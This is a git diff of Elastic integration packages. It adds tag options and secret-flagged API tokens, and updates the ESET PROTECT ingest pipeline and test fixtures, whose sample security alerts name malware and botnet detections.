a/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs index 698ed7ea9c8..c68619d04ac 100644 --- a/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/server/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/server/manifest.yml b/packages/elasticsearch/data_stream/server/manifest.yml index a60316096c5..c366c8870f6 100644 --- a/packages/elasticsearch/data_stream/server/manifest.yml +++ b/packages/elasticsearch/data_stream/server/manifest.yml @@ -11,6 +11,12 @@ streams: show_user: true default: - /var/log/elasticsearch/*_server.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Server logs description: Collect server logs using log input diff --git a/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs index e1c03081610..906df9fd016 100644 --- a/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/shard/agent/stream/stream.yml.hbs @@ -24,6 +24,10 @@ condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} condition: ${kubernetes_leaderelection.leader} == true {{/if}} {{ else }} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition }} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/shard/manifest.yml b/packages/elasticsearch/data_stream/shard/manifest.yml index aadc08a536d..e93583a0ad7 100644 --- a/packages/elasticsearch/data_stream/shard/manifest.yml +++ b/packages/elasticsearch/data_stream/shard/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs index 809534c4e1e..a5e3b2d457b 100644 --- a/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/slowlog/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/slowlog/manifest.yml b/packages/elasticsearch/data_stream/slowlog/manifest.yml index 1f7803346f4..de703082e3c 100644 --- a/packages/elasticsearch/data_stream/slowlog/manifest.yml +++ b/packages/elasticsearch/data_stream/slowlog/manifest.yml @@ -12,6 +12,12 @@ streams: default: - /var/log/elasticsearch/*_index_search_slowlog.json - /var/log/elasticsearch/*_index_indexing_slowlog.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Slowlog logs description: Collect Elasticsearch slowlog logs using log input diff --git a/packages/elasticsearch/docs/README.md b/packages/elasticsearch/docs/README.md index c0ed49a195b..efd93aee645 100644 --- a/packages/elasticsearch/docs/README.md +++ b/packages/elasticsearch/docs/README.md @@ -2271,6 +2271,7 @@ An example event for `node_stats` looks as following: | elasticsearch.node.stats.indices.segments.term_vectors.memory.bytes | | long | gauge | | elasticsearch.node.stats.indices.segments.terms.memory.bytes | | long | gauge | | elasticsearch.node.stats.indices.segments.version_map.memory.bytes | | long | gauge | +| elasticsearch.node.stats.indices.shard_stats.total_count | | long | | | elasticsearch.node.stats.indices.store.size.bytes | Total size of the store in bytes. | long | gauge | | elasticsearch.node.stats.indices.store.total_data_set_size.bytes | Total size of shards in bytes assigned to this node including backing data for partially mounted indices. | long | gauge | | elasticsearch.node.stats.ingest.total.count | | long | counter | diff --git a/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json b/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json index af795a06bb0..adcc1f63a16 100644 --- a/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json +++ b/packages/elasticsearch/kibana/dashboard/elasticsearch-ea5b81a0-7fbf-11ed-8509-ddabeb9daeaf.json @@ -4233,4 +4233,4 @@ } ], "type": "dashboard" -} +} \ No newline at end of file diff --git a/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json b/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json index 04ca71292ab..14103996815 100644 --- a/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json +++ b/packages/elasticsearch/kibana/index_pattern/befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9.json @@ -1 +1,22 @@ -{"attributes":{"fieldAttrs":"{\"metricset.name\":{\"count\":6},\"elasticsearch.index.name\":{\"count\":5},\"_index\":{\"count\":9},\"elasticsearch.node.name\":{\"count\":2},\"elasticsearch.shard.source_node.name\":{\"count\":2},\"source_node.name\":{\"count\":2}}","fieldFormatMap":"{}","fields":"[]","name":"ES Stack Monitoring","runtimeFieldMap":"{}","sourceFilters":"[]","timeFieldName":"@timestamp","title":".ds-.monitoring-es-*,.monitoring-es*,.ds-metrics-elasticsearch.stack_monitoring.*","typeMeta":"{}"},"coreMigrationVersion":"8.8.0","created_at":"2023-12-11T09:50:10.352Z","id":"befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9","managed":false,"references":[],"type":"index-pattern","typeMigrationVersion":"8.0.0","updated_at":"2023-12-11T09:50:10.352Z","version":"WzExOCwxXQ=="} +{ + "attributes": { + "fieldAttrs": "{\"metricset.name\":{\"count\":6},\"elasticsearch.index.name\":{\"count\":5},\"_index\":{\"count\":9},\"elasticsearch.node.name\":{\"count\":2},\"elasticsearch.shard.source_node.name\":{\"count\":2},\"source_node.name\":{\"count\":2}}", + "fieldFormatMap": "{}", + "fields": "[]", + "name": "ES Stack Monitoring", + "runtimeFieldMap": "{}", + "sourceFilters": "[]", + "timeFieldName": "@timestamp", + "title": ".ds-.monitoring-es-*,.monitoring-es*,.ds-metrics-elasticsearch.stack_monitoring.*", + "typeMeta": "{}" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-11T09:50:10.352Z", + "id": "befe6dd7-ec0b-4cb7-aa59-e4d5e6f39ae9", + "managed": false, + "references": [], + "type": "index-pattern", + "typeMigrationVersion": "8.0.0", + "updated_at": "2023-12-11T09:50:10.352Z", + "version": "WzExOCwxXQ==" +} \ No newline at end of file diff --git a/packages/elasticsearch/manifest.yml b/packages/elasticsearch/manifest.yml index c2f709acca2..781bb17a8db 100644 --- a/packages/elasticsearch/manifest.yml +++ b/packages/elasticsearch/manifest.yml @@ -1,6 +1,6 @@ name: elasticsearch title: Elasticsearch -version: 1.13.1 +version: 1.15.0 description: Elasticsearch Integration type: integration icons: diff --git a/packages/entityanalytics_entra_id/changelog.yml b/packages/entityanalytics_entra_id/changelog.yml index c547b8c13ad..8bab2d9c91c 100644 --- a/packages/entityanalytics_entra_id/changelog.yml +++ b/packages/entityanalytics_entra_id/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml b/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml index 22548aadfc5..42b8db3fdb0 100644 --- a/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml +++ b/packages/entityanalytics_entra_id/data_stream/entity/manifest.yml @@ -19,6 +19,7 @@ streams: type: password title: Secret (API Key) required: true + secret: true - name: dataset type: select title: Dataset diff --git a/packages/entityanalytics_entra_id/manifest.yml b/packages/entityanalytics_entra_id/manifest.yml index ddaa13afdca..6e5314f27e6 100644 --- a/packages/entityanalytics_entra_id/manifest.yml +++ b/packages/entityanalytics_entra_id/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: entityanalytics_entra_id title: "Microsoft Entra ID Entity Analytics" -version: "1.0.1" +version: "1.1.0" description: "Collect identities from Microsoft Entra ID (formerly Azure Active Directory) with Elastic Agent." type: integration categories: @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" elastic: subscription: "basic" icons: diff --git a/packages/entityanalytics_okta/changelog.yml b/packages/entityanalytics_okta/changelog.yml index a231aaf7d37..ccb00e5a8b7 100644 --- a/packages/entityanalytics_okta/changelog.yml +++ b/packages/entityanalytics_okta/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/entityanalytics_okta/data_stream/user/manifest.yml b/packages/entityanalytics_okta/data_stream/user/manifest.yml index 213cb15c458..e57abfa0c76 100644 --- a/packages/entityanalytics_okta/data_stream/user/manifest.yml +++ b/packages/entityanalytics_okta/data_stream/user/manifest.yml @@ -20,6 +20,7 @@ streams: required: true show_user: true description: The Okta API token, used for authentication. + secret: true - name: dataset type: select title: Okta Dataset diff --git a/packages/entityanalytics_okta/manifest.yml b/packages/entityanalytics_okta/manifest.yml index 1e499f6bada..d6f3b28bd8c 100644 --- a/packages/entityanalytics_okta/manifest.yml +++ b/packages/entityanalytics_okta/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: entityanalytics_okta title: Okta Entity Analytics -version: "1.0.1" +version: "1.1.0" description: "Collect User Identities from Okta with Elastic Agent." type: integration categories: - security conditions: kibana: - version: "^8.9.0" + version: "^8.12.0" elastic: subscription: "basic" screenshots: diff --git a/packages/eset_protect/changelog.yml b/packages/eset_protect/changelog.yml index 78cdaa8731e..66eb2d62b91 100644 --- a/packages/eset_protect/changelog.yml +++ b/packages/eset_protect/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "0.4.0" + changes: + - description: Lowercase related hash and indicator hash to support indicator rule matching. Fixed grok parse error when object_uri equals 'script'. + type: enhancement + link: https://github.com/elastic/integrations/pull/9465 +- version: "0.3.0" + changes: + - description: Fix host and file ECS fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9382 +- version: "0.2.0" + changes: + - description: Set sensitive values as secret, upgrade to package spec 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 - version: "0.1.1" changes: - description: Changed owners diff --git a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log index bd49f88efc9..daf2e75140e 100644 --- a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log +++ b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log @@ -4,4 +4,5 @@ {"category":"DETECTION_CATEGORY_VULNERABILITY","objectUrl":"C:\\Temp\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8","uuid":"xxx-xxxx-0987-1234-xxxxxxxxxxxx","severityLevel":"SEVERITY_LEVEL_HIGH","responses":[{}],"occurTime":"2023-10-28T10:36:53Z","objectTypeName":"Memory","objectHashSha1":"AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D","networkCommunication":{"protocolName":"0","remoteIpAddress":"67.43.156.0","remotePort":443,"localIpAddress":"216.160.83.56","localPort":80,"direction":"NETWORK_COMMUNICATION_DIRECTION_OUTBOUND"},"context":{"process":{"path":"C:\\Windows\\exampletest.exe"},"deviceUuid":"xxx-0985-1234-1234-xxxxxxxxxxxx","userName":"Administrator","circumstances":"Win32/Injector.DTLK"}} {"category":"DETECTION_CATEGORY_UNSPECIFIED","typeName":"Test file","objectUrl":"C:\\Temp\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8","uuid":"xxx-xxxx-9789-1234-xxxxxxxxxxxx","severityLevel":"SEVERITY_LEVEL_UNSPECIFIED","responses":[{}],"occurTime":"2023-07-28T10:36:53Z","objectTypeName":"Memory","objectHashSha1":"AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D","networkCommunication":{"protocolName":"0","remoteIpAddress":"175.16.199.1","remotePort":8080,"localIpAddress":"216.160.83.56","localPort":80,"direction":"NETWORK_COMMUNICATION_DIRECTION_OUTBOUND"},"context":{"process":{"path":"C:\\exampletest.exe"},"deviceUuid":"xxx-1234-1234-1234-xxxxxxxxxxxx","userName":"example\\exmpleuser","circumstances":"Win32/Injector.DTLK"}} {"category":"DETECTION_CATEGORY_HIPS_RULE","typeName":"Potentially unwanted application","objectUrl":"C:\\Temp\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8","uuid":"xxx-1234-9789-1234-xxxxxxxxxxxx","severityLevel":"SEVERITY_LEVEL_DIAGNOSTIC","responses":[{}],"occurTime":"2023-07-15T10:36:53Z","objectTypeName":"Memory","objectHashSha1":"AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D","networkCommunication":{"protocolName":"http","remoteIpAddress":"1.128.0.0","remotePort":56,"localIpAddress":"1.128.0.5","localPort":8080,"direction":"NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED"},"context":{"process":{"path":"C:\\exampletest.exe"},"deviceUuid":"xxx-1234-2345-1234-xxxxxxxxxxxx","userName":"example","circumstances":"Blocked by Administrator"}} +{"category":"DETECTION_CATEGORY_UNSPECIFIED","context":{"circumstances":"Malware: VBS/TrojanDownloader.Agent.YUI","deviceUuid":"16b429cb-c064-4a31-98ba-62fff54f0c96","process":{"path":"%SYSTEM%\\windowspowershell\\v1.0\\powershell.exe"},"userName":"kate-ebademo\\kate"},"displayName":"","networkCommunication":{"direction":"NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED","localIpAddress":"","localPort":0,"protocolName":"0","remoteIpAddress":"","remotePort":0},"objectHashSha1":"22B9B35A804A7A3739CBD007E00959075AECF0FC","objectName":"","objectTypeName":"File","objectUrl":"script","occurTime":"2024-03-27T09:54:20Z","responses":[{"description":"","deviceRestartRequired":false,"displayName":"","protectionName":""}],"severityLevel":"SEVERITY_LEVEL_LOW","typeName":"nil","uuid":"ae4d218f-5806-e446-0b86-609e5a4cfa94"} {"message":"retry"} diff --git a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json index fa79456f0e1..413e212abb5 100644 --- a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json +++ b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json @@ -65,7 +65,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B482CD9AEA9434D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d" } }, "host": { @@ -83,7 +83,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B482CD9AEA9434D" + "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d" ], "hosts": [ "xxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" @@ -180,7 +180,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" } }, "host": { @@ -198,7 +198,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" ], "hosts": [ "xxx-xxxx-1234-5678-xxxxxxxxxxxx" @@ -294,7 +294,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" } }, "host": { @@ -315,7 +315,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-xxxx-1234-1234-xxxxxxxxxxxx" @@ -449,7 +449,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-0985-1234-1234-xxxxxxxxxxxx" @@ -570,7 +570,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-1234-1234-1234-xxxxxxxxxxxx" @@ -696,7 +696,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-1234-2345-1234-xxxxxxxxxxxx" @@ -737,6 +737,107 @@ "name": "example" } }, + { + "@timestamp": "2024-03-27T09:54:20.000Z", + "destination": { + "port": 0 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "detection": { + "category": "DETECTION_CATEGORY_UNSPECIFIED", + "context": { + "circumstances": "Malware: VBS/TrojanDownloader.Agent.YUI", + "device_uuid": "16b429cb-c064-4a31-98ba-62fff54f0c96", + "process": { + "path": "%SYSTEM%\\windowspowershell\\v1.0\\powershell.exe" + }, + "user_name": "kate-ebademo\\kate" + }, + "network_communication": { + "direction": "NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED", + "local": { + "port": 0 + }, + "protocol_name": "0", + "remote": { + "port": 0 + } + }, + "object_hash_sha1": "22B9B35A804A7A3739CBD007E00959075AECF0FC", + "object_type_name": "File", + "object_url": "script", + "occur_time": "2024-03-27T09:54:20.000Z", + "responses": [ + { + "device_restart_required": false + } + ], + "severity_level": "SEVERITY_LEVEL_LOW", + "type_name": "nil", + "uuid": "ae4d218f-5806-e446-0b86-609e5a4cfa94" + } + }, + "event": { + "kind": "alert", + "original": "{\"category\":\"DETECTION_CATEGORY_UNSPECIFIED\",\"context\":{\"circumstances\":\"Malware: VBS/TrojanDownloader.Agent.YUI\",\"deviceUuid\":\"16b429cb-c064-4a31-98ba-62fff54f0c96\",\"process\":{\"path\":\"%SYSTEM%\\\\windowspowershell\\\\v1.0\\\\powershell.exe\"},\"userName\":\"kate-ebademo\\\\kate\"},\"displayName\":\"\",\"networkCommunication\":{\"direction\":\"NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED\",\"localIpAddress\":\"\",\"localPort\":0,\"protocolName\":\"0\",\"remoteIpAddress\":\"\",\"remotePort\":0},\"objectHashSha1\":\"22B9B35A804A7A3739CBD007E00959075AECF0FC\",\"objectName\":\"\",\"objectTypeName\":\"File\",\"objectUrl\":\"script\",\"occurTime\":\"2024-03-27T09:54:20Z\",\"responses\":[{\"description\":\"\",\"deviceRestartRequired\":false,\"displayName\":\"\",\"protectionName\":\"\"}],\"severityLevel\":\"SEVERITY_LEVEL_LOW\",\"typeName\":\"nil\",\"uuid\":\"ae4d218f-5806-e446-0b86-609e5a4cfa94\"}", + "type": [ + "info" + ] + }, + "file": { + "hash": { + "sha1": "22b9b35a804a7a3739cbd007e00959075aecf0fc" + } + }, + "host": { + "id": "16b429cb-c064-4a31-98ba-62fff54f0c96" + }, + "message": "Malware: VBS/TrojanDownloader.Agent.YUI", + "observer": { + "product": "ESET PROTECT", + "type": "ids", + "vendor": "ESET" + }, + "process": { + "executable": "%SYSTEM%\\windowspowershell\\v1.0\\powershell.exe", + "name": "powershell.exe" + }, + "related": { + "hash": [ + "22b9b35a804a7a3739cbd007e00959075aecf0fc" + ], + "hosts": [ + "16b429cb-c064-4a31-98ba-62fff54f0c96" + ], + "user": [ + "kate" + ] + }, + "rule": { + "category": "DETECTION_CATEGORY_UNSPECIFIED" + }, + "source": { + "port": 0 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "technique": { + "name": [ + "nil" + ] + } + }, + "user": { + "domain": "kate-ebademo", + "name": "kate" + } + }, null ] } \ No newline at end of file diff --git a/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml b/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml index cbd0fd76d87..a88bb06c12e 100644 --- a/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml +++ b/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml @@ -331,12 +331,20 @@ processors: copy_from: eset_protect.detection.object_hash_sha1 ignore_empty_value: true if: ctx.eset_protect?.detection?.object_type_name == "File" + - lowercase: + field: file.hash.sha1 + tag: lowercase_file_hash_sha1 + ignore_missing: true - append: field: related.hash tag: append_object_hash_sha1_into_related_hash value: "{{{eset_protect.detection.object_hash_sha1}}}" allow_duplicates: false if: ctx.eset_protect?.detection?.object_hash_sha1 != null + - lowercase: + field: related.hash + tag: lowercase_related_hash + ignore_missing: true - rename: field: json.objectName tag: rename_objectName diff --git a/packages/eset_protect/data_stream/detection/sample_event.json b/packages/eset_protect/data_stream/detection/sample_event.json index be272329d06..20db63b13a6 100644 --- a/packages/eset_protect/data_stream/detection/sample_event.json +++ b/packages/eset_protect/data_stream/detection/sample_event.json @@ -1,8 +1,8 @@ { "@timestamp": "2023-10-26T13:36:53.000Z", "agent": { - "ephemeral_id": "eaf0a213-9722-4532-9223-51619c3f6c91", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "96cc7ee0-ede2-46a4-9b0e-4104dead04cc", + "id": "78166295-0693-4726-a27f-cd8722896c22", "name": "docker-fleet-agent", "type": "filebeat", "version": "8.12.0" @@ -38,8 +38,8 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, + "id": "78166295-0693-4726-a27f-cd8722896c22", + "snapshot": false, "version": "8.12.0" }, "eset_protect": { @@ -75,7 +75,7 @@ "intrusion_detection" ], "dataset": "eset_protect.detection", - "ingested": "2024-01-04T10:08:34Z", + "ingested": "2024-03-18T21:48:09Z", "kind": "alert", "original": "{\"category\":\"DETECTION_CATEGORY_NETWORK_INTRUSION\",\"context\":{\"circumstances\":\"Eicar\",\"deviceUuid\":\"xxx-xxxx-1234-5678-xxxxxxxxxxxx\",\"process\":{\"path\":\"C:\\\\Windows\\\\chrome.exe\"},\"userName\":\"testingpc\\\\example\"},\"networkCommunication\":{\"protocolName\":\"0\",\"remoteIpAddress\":\"89.160.20.112\",\"remotePort\":443},\"objectHashSha1\":\"AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D\",\"objectTypeName\":\"File\",\"objectUrl\":\"C:\\\\Temp\\\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8\",\"occurTime\":\"2023-10-26T13:36:53Z\",\"responses\":[{}],\"severityLevel\":\"SEVERITY_LEVEL_MEDIUM\",\"typeName\":\"TCP Port scanning attack\",\"uuid\":\"xxx-xxxx-xxxx-1234-xxxxxxxxxxxx\"}", "type": [ @@ -84,7 +84,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" } }, "host": { @@ -105,7 +105,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" ], "hosts": [ "xxx-xxxx-1234-5678-xxxxxxxxxxxx" diff --git a/packages/eset_protect/data_stream/device_task/sample_event.json b/packages/eset_protect/data_stream/device_task/sample_event.json index dd4cca3a0c5..5e87d6dc646 100644 --- a/packages/eset_protect/data_stream/device_task/sample_event.json +++ b/packages/eset_protect/data_stream/device_task/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2024-01-04T10:09:14.915Z", + "@timestamp": "2024-03-27T16:00:29.582Z", "agent": { - "ephemeral_id": "3873a5a6-ab80-4d05-b35a-e91aa4c7f86e", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c5a8ca66-614e-438e-b69a-9e12cb12aa7d", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.device_task", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "device_task": { @@ -58,7 +58,7 @@ "action": "Shutdown computer", "agent_id_status": "verified", "dataset": "eset_protect.device_task", - "ingested": "2024-01-04T10:09:26Z", + "ingested": "2024-03-27T16:00:39Z", "kind": "event", "original": "{\"action\":{\"name\":\"Shutdown computer\",\"params\":{\"@type\":\"type.googleapis.com/Era.Common.DataDefinition.Task.ESS.OnDemandScan\",\"cleaningEnabled\":true,\"customProfileName\":\"DefaultProfile\",\"scanProfile\":\"InDepth\",\"scanTargets\":[\"eset://AllTargets\"]}},\"description\":\"Automatically created via context menu\",\"displayName\":\"Reboot Computer - via context menu\",\"targets\":{\"devicesUuids\":[\"0205321e-XXXX-XXXX-1234-feeb35010ea7\",\"0205321e-XXXX-XXXX-5678-feeb35010ea7\",\"0205321e-XXXX-1234-5678-feeb35010ea7\"]},\"triggers\":[{\"manual\":{\"expireTime\":\"2023-12-01T01:30:00Z\"}}],\"uuid\":\"c93070e0-XXXX-1234-5678-c48f0e5e0b7e\",\"versionId\":\"1511\"}", "type": [ diff --git a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log index aee5f471d23..68ed05019f7 100644 --- a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log +++ b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log @@ -8,3 +8,17 @@ {"event_type":"Threat_Event","ipv4":"192.168.30.31","hostname":"031-mg","group_name":"All/Lost & found","os_name":"Microsoft Windows 10 Pro","group_description":"Lost & found static group","source_uuid":"xxx-xxxx-1234-xxxx-xxxxxxxxxxxx","occured":"25-Jun-2021 09:47:30","severity":"High","threat_type":"Malware","threat_name":"Trojan.Generic","scanner_id":"Real-time file system protection","scan_id":"file123.exe","engine_version":"23500 (20210622)","object_type":"File","object_uri":"file:///C:/Users/Administrator/Downloads/malicious.exe","action_taken":"Quarantined","threat_handled":true,"need_restart":false,"username":"031-MG\\Administrator","processname":"C:\\Program Files\\MalwareScanner\\Scanner.exe","circumstances":"Event occurred on a downloaded file.","firstseen":"21-Jun-2021 09:47:29","hash":"8F765A7D2B0E4D11BC0E79313A8F8E0019F317D9"} {"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"firewall-test","group_name":"All/Lost & found","os_name":"Microsoft Windows 10 Pro","group_description":"Lost & found static group","source_uuid":"xxx-xxxx-1234-xxxx-xxxxxxxxxxxx","occured":"28-Jun-2023 15:25:12","severity":"High","event":"Denial of Service Attack","source_address":"192.168.30.32","source_address_type":"IPv4","source_port":54321,"target_address":"192.168.30.31","target_address_type":"IPv4","target_port":80,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Windows\\System32\\svchost.exe","inbound":true,"threat_name":"DoS.Generic","aggregate_count":5} {"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"firewall-test","group_name":"All/Lost & found","os_name":"Microsoft Windows 10 Pro","group_description":"Lost & found static group","source_uuid":"xxx-xxxx-1234-1234-xxxxxxxxxxxx","occured":"24-Apr-2023 15:25:12","severity":"High","event":"Denial of Service Attack","source_address":"2a02:cf40::","source_address_type":"IPv6","source_port":8080,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":80,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Windows\\System32\\svchost.exe","inbound":true,"threat_name":"DoS.Generic","aggregate_count":5} +{"event_type":"FirewallAggregated_Event","ipv4":"1.128.0.5","hostname":"machine1.domain.com","source_uuid":"ca28cf94-2696-44e6-bb0a-1325b09c562f","occured":"15-Mar-2024 18:49:08","severity":"Fatal","event":"Suspected botnet detected","source_address":"192.168.101.2","source_address_type":"IPv4","source_port":53884,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":443,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"EK-Mozi","aggregate_count":1} 